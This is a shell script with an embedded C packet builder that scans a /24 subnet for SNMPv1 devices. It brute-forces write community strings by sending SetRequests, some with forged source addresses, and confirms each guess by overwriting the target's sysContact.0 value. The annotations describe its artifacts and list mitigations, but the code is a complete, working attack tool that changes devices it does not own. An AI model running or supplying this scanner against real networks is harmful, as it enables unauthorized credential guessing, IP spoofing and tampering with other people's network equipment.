#!/bin/sh
# SNMP community-string guessing scanner (SNMPv1; Polish-language strings:
# WYSZLO = "it came out", milczy = "is silent").
#
# Despite the banner this is not a read-only check. For every host in the
# /24 that answers an snmpget with community "public", it sends SNMPv1
# SetRequests built by a small C helper, one burst per candidate community
# string, and reports the string as "WORKED" when sysContact.0 afterwards
# reads back as "null". A successful run therefore MODIFIES the target's
# sysContact value.
#
# Artifacts on the scanning host: .walk.tmp / .walk.tmp2 and the results
# file WYSZLO in the current directory, /tmp/spoof-<pid> and
# /tmp/spoof-<pid>.c, and short-lived nc / traceroute / snmpget processes.
# On the wire: SNMPv1 GET of sysDescr.0 and sysContact.0 with community
# "public", then per candidate four UDP/161 SetRequests, three of them with
# forged source addresses (127.0.0.1, the target's own address, <subnet>.1).
#
# Mitigation: disable SNMPv1/v2c write communities or move to SNMPv3 with
# authentication; restrict UDP/161 to an allow-list of management hosts;
# apply anti-spoofing ingress filtering so packets sourced from loopback,
# the device's own address or an internal prefix are dropped at the edge.
#
# Usage: $0 start_at c_subnet   (e.g. "0 172.16.1" scans 172.16.1.0-255)

# Clear leftovers from a previous run (this also wipes an existing WYSZLO
# results file).
rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null
echo "snmpd vulnerability scanner by "
echo
x=$1     # last-octet value to start scanning at
PRE=$2   # first three octets of the /24, e.g. 172.16.1
if [ "$2" = "" ]; then
  echo "Usage: $0 start_at c_subnet"
  echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255."
  echo
  exit
fi

# Helper program, compiled per run into /tmp/spoof-<pid>. It writes one
# SNMPv1 SetRequest to stdout: part1 is the message header up to the
# community OCTET STRING tag, the community length byte and the community
# from argv[1] are spliced in, and part2 is the SetRequest PDU (tag 0xA3)
# for OID 1.3.6.1.2.1.1.4.0 (sysContact.0) with the value "null".
SPFILE="/tmp/spoof-$$"
cat >$SPFILE.c <<_EOF_
char buf[1000];
char part1[]="0\202\0-\2\1\0\4";
char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main(int argc,char**argv) {
char x=strlen(argv[1]);
memcpy(buf,part1,sizeof(part1)-1);
memcpy(buf+sizeof(part1)-1,&x,1);
strcpy(buf+sizeof(part1),argv[1]);
memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1);
write(1,buf,x+1+sizeof(part1)+sizeof(part2));
}
_EOF_
echo "Compiling helper application..."
gcc -o $SPFILE $SPFILE.c
test -x $SPFILE || exit

echo "Scan range: $PRE.$x-255..."
if [ "$1" = "0" ]; then
  # When starting from .0, run traceroute toward <subnet>.32 for 6 seconds
  # and seed the host list with field 2 of its -n output (normally the hop
  # address), so intermediate routers are probed as well.
  echo "* Collecting routing information (6 seconds)..."
  /usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp &
  sleep 6
  killall traceroute &>/dev/null   # kills every traceroute on this host
  awk '{print $2}' .walk.tmp >.walk.tmp2
fi
echo "Starting scan. 
Outfile is: WYSZLO"

# Append <subnet>.x .. <subnet>.255 to the host list.
while [ "$x" -lt "256" ]; do
  echo $PRE.$x >>.walk.tmp2
  let x=x+1
done

# Candidate community strings, tried in this order. The loop below adds
# 'all private', 'Secret C0de' and the first word of the host's sysDescr.
COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default password tivoli openview community snmp snmpd system"

# The host list is expanded once here; .walk.tmp2 is reused as scratch
# space inside the loop.
for i in `cat .walk.tmp2`; do
  echo -n "$i: "
  # Initial reachability check with community "public".
  snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
  # Any error/timeout wording in snmpget's output counts as "no SNMP";
  # 'acce' also matches words such as "access".
  ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`"
  if [ "$ERR" = "0" ]; then
    echo "OK"
    echo -n " system: "
    # sysDescr value is the text between the first pair of double quotes.
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYS="`cat .walk.tmp2`"
    echo "$SYS"
    snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    # SYSNAME is the first word of sysDescr (not sysName), used as an
    # extra community candidate.
    SYSNAME="`awk '{print $1}' .walk.tmp2`"
    echo "$i ($SYS):" >>WYSZLO
    for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do
      echo -n " $j> "
      # Four copies of the same SetRequest: one with the real source and
      # three with forged sources via nc -s. Whether a given nc build can
      # actually emit packets from a non-local source is host-dependent;
      # some of these may simply fail to bind.
      $SPFILE "$j" | nc -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null &
      sleep 1
      killall nc &>/dev/null   # kills every nc on this host, not only the four above
      # Verify with community "public": if sysContact.0 now reads "null",
      # the SET with community $j was accepted (and the device was changed).
      snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp
      WORKED="`grep -c null .walk.tmp 2>/dev/null`"
      if [ "$WORKED" = "0" ]; then
        echo " - $j failed." >>WYSZLO
        echo "failed."
      else
        echo "OK"
        echo " - $j WORKED." >>WYSZLO
        break   # stop at the first community that worked for this host
      fi
    done
  else
    echo "milczy..."   # Polish: "silent" -- host did not answer the GET
  fi
done
echo "Done."
# Remove scratch files and the compiled helper; the WYSZLO results file is kept.
rm -f .walk.tmp* $SPFILE*